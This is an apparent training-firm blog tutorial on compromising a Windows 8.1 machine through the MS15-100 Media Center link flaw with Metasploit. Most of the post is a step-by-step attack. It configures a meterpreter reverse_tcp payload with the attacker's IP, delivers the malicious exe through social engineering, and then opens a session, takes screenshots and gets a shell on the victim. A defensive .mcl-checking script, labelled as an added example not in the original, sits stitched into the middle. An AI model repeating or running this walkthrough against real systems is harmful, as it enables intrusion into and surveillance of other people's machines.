Exploit Windows 8.1 using Media Centre Vulnerability (MCL)-MS15_100 With Metasploit–2017

NOTE: THIS POST IS ONLY FOR EDUCATIONAL PURPOSES. USE THIS AT YOUR OWN RISK.

This post is about the Microsoft Windows Media Center MCL vulnerability (MS15-100). We discuss the vulnerability and then exploit it to compromise a Windows 8.1 Pro machine.

The vulnerability could allow remote code execution if Windows Media Center opens a specially crafted Media Center link (.mcl) file that references malicious code. An attacker who successfully exploited this vulnerability could gain the same user rights as the current user.
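As an added example that is not part of the original post (nor Metasploit's own code), the following Python check parses an .mcl file and flags it when the link's run target is a remote UNC path or URL, or an executable, which is the pattern the vulnerability description above relies on. It assumes the .mcl format is an XML document whose <application> element carries a run attribute naming the program to launch; the two sample files are constructed.

```python
"""Flag Media Center link (.mcl) files whose run target is remote or an
executable, the pattern MS15-100 abuses. Added example for this post, not
the original post's or Metasploit's code. Assumes the .mcl format is an XML
document with an <application> element carrying a run attribute; the sample
files below are constructed."""
import re
import xml.etree.ElementTree as ET

# A UNC path (\\host\share\...) or an http(s) URL as the run target means the
# link file is asking Media Center to launch something fetched remotely.
REMOTE_RE = re.compile(r'^(\\\\[^\\]+\\|https?://)', re.IGNORECASE)
# Extensions a link file has no legitimate reason to launch directly.
EXEC_EXT = (".exe", ".dll", ".scr", ".bat", ".cmd", ".ps1", ".vbs", ".js")


def check_mcl(text):
    """Return the reasons this .mcl content looks suspicious (empty list = clean)."""
    reasons = []
    try:
        root = ET.fromstring(text)
    except ET.ParseError as exc:
        return ["unparseable XML: %s" % exc]
    for elem in root.iter():
        if elem.tag.lower() != "application":
            continue
        run = (elem.get("run") or "").strip()
        if not run:
            continue
        if REMOTE_RE.match(run):
            reasons.append("run target is remote: %s" % run)
        # Drop any arguments and surrounding quotes, keep the program path.
        program = run.split()[0].strip('"').lower()
        if program.endswith(EXEC_EXT):
            reasons.append("run target is an executable: %s" % run)
    return reasons


# Constructed samples; the second mirrors the UNC link shape shown in the post.
CLEAN_MCL = '<application title="Photos" url="http://localhost/photos/" />'
SUSPICIOUS_MCL = ('<application title="Update" '
                  'run="\\\\172.158.11.45\\GkRhdy\\msf.exe" />')

if __name__ == "__main__":
    for name, content in (("clean", CLEAN_MCL), ("suspicious", SUSPICIOUS_MCL)):
        print(name, check_mcl(content) or ["clean"])
```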

This security update is rated Important for all supported editions of Windows Media Center when installed on Windows Vista, Windows 7, Windows 8, or Windows 8.1.

AFFECTED OPERATING SYSTEMS

Operating System
Windows Vista Service Pack 2
Windows Vista x64 Edition Service Pack 2
Windows 7 for 32-bit Systems Service Pack 1
Windows 7 for x64-based Systems Service Pack 1
Windows 8 for 32-bit Systems
Windows 8 for x64-based Systems
Windows 8.1 for 32-bit Systems
Windows 8.1 for x64-based Systems

Methodology

We will use Metasploit to exploit the MCL (MS15-100) vulnerability, using its MS15_100 exploit module. The module creates a malicious executable file; we get this file onto the target with some kind of social engineering trick, and as soon as the target executes it, he/she is pwned.

LAB SETUP

We will use Windows 8.1 Pro as the target machine and Kali Linux 2.0 as the attacker machine, both running live. Kali Linux IP address: 172.158.11.45

Steps of Exploitation

Step 1.

First of all, open a terminal on the Kali Linux machine and type msfconsole. This command starts Metasploit, which takes a little time; wait a few moments and Metasploit will run as you can see in the picture.

Step 2.

Now we have to load the exploit for the MCL vulnerability, which is pre-installed in Metasploit. To load it, type use exploit/windows/fileformat/ms15_100_mcl_exe. This command loads our exploit.

Step 3.

Set the payload for a reverse connection from the target machine: type set payload windows/meterpreter/reverse_tcp

Step 4.

Now check the required options for the exploit and payload. To check these, type show options and it displays all required options.

Here we have to configure the exploit and payload. We have to set srvhost (server host address); our exploit is hosted on this address. To set srvhost, type set srvhost <your Kali Linux machine IP address>

Set the local host (lhost) address for the payload. This is also our Kali Linux machine's IP address, which is used to receive the reverse connection.

To find your Kali Linux machine's IP address, open a new terminal and type ifconfig

Step 5. Now set the srvhost and lhost, as you see in the picture.

Type set srvhost 172.158.11.45

Type set lhost 172.158.11.45

Step 6.

All weapons are loaded; now fire them by typing the exploit command. When you type exploit, it creates a malicious executable file with an mcl link. Get this file onto the target machine with some kind of social engineering technique.

Step 7.

Open the link generated by the exploit on the target machine. In my case this link is \\172.158.11.45\GkRhdy\msf.exe; download the exe file.

Step 8.

Now run this file on the target machine.

Step 9.

When the target clicks Run, we get a meterpreter session on our attacker machine (Kali Linux).

Step 10.

Now check the meterpreter sessions: type the sessions -i command.

Step 11.

To get into a meterpreter session, type the sessions -i <id> command, for example sessions -i 1, and you get the meterpreter session.

Step 12.

In a meterpreter session we can do lots of things. Here we type the help command to see which interesting commands we can run.

Step 13.

I ran the screenshot command in meterpreter to get a screenshot of the target machine, and it is saved in the /root directory. After that I ran one more command, the shell command, to get the cmd of the target machine, and we get the cmd of the target machine.

Step 14.

After getting the cmd of the target machine, I typed the systeminfo command and got all the details of the target machine.

Author — Kamaljeet Kumar – Information Security Engineer, Codec Networks, Delhi

About

Codec Networks provides IT Trainings from EC Council CEH ECSA, LPT, CHFI, Network Security, Penetration Testing, ISACA, ISC2, PECB ISO 27001LA LI, Cisco Networking CCNA CCNP, Linux Administration RHCE, Prog Languages JAVA, Advanced Java, android development. We also offer B2B Industry Solutions and Services in IT | Information|Cyber Security in Delhi NCR India.
